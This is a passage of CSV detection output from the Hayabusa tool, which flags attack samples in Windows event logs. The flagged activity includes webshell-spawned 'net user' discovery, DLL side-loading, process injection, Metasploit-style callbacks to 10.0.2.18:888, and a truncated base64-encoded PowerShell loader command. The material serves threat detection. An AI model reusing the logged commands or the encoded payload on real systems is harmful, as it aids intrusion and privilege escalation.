Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx 2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,LatMov | Evas | C2,Netsh RDP Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx 2019-05-24 10:33:53.112 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" /c net user | Process: C:\Windows\System32\cmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x9cf992 | PID: 2404 | PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.122 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: c:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2580 | Src PGUID: 365ABB72-49D6-5CE7-0000-001020A7A700 | Tgt PID: 2404 | Tgt PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.182 +09:00,IEWIN7,1,info,,Process Created,"Cmd: net user | Process: C:\Windows\System32\net.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""c:\windows\system32\cmd.exe"" /c net user | LID: 0x9cf992 | PID: 788 | PGUID: 365ABB72-4A01-5CE7-0000-00102DA1AC00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.192 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\net1 user | Process: C:\Windows\System32\net1.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: net user | LID: 0x9cf992 | PID: 712 | PGUID: 365ABB72-4A01-5CE7-0000-0010B6A2AC00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc,Local Accounts 
Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-25 00:38:21.485 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell ExecPolicy Changed | SetValue: HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy: Unrestricted | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3208 | PGUID: 365ABB72-0FAE-5CE8-0000-0010FE1E0800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_powershell_execpolicy_changed_sysmon_13.evtx 2019-05-26 13:01:42.385 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x12962 | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.385 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.545 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.966 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.966 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.966 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src PID: 3884 | Src PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Tgt PID: 3908 | Tgt PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\svchost.exe | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | LID: 0x3e7 | PID: 3908 | PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Evas | PrivEsc,Suspect Svchost Activity,,rules/sigma/process_creation/proc_creation_win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:44.047 +09:00,IEWIN7,5,info,,Process 
Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:44.598 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-27 00:47:56.667 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:56.667 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\System32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:56.727 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:57.628 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49166 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: 
C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49167 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49168 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49169 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 
365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49170 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49171 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.752 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\notepad.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3388 | Src PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100 | Tgt PID: 1240 | Tgt PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.752 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\notepad.exe | LID: 0x3e7 | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:01.864 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49172 (IEWIN7) | Dst: 10.0.2.18:888 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\notepad.exe | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 2584 | PGUID: 365ABB72-3D4A-5CEB-0000-0010FA93FD00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Suspicious Execution of Powershell with Base64,,rules/sigma/process_creation/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.000 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0Ab
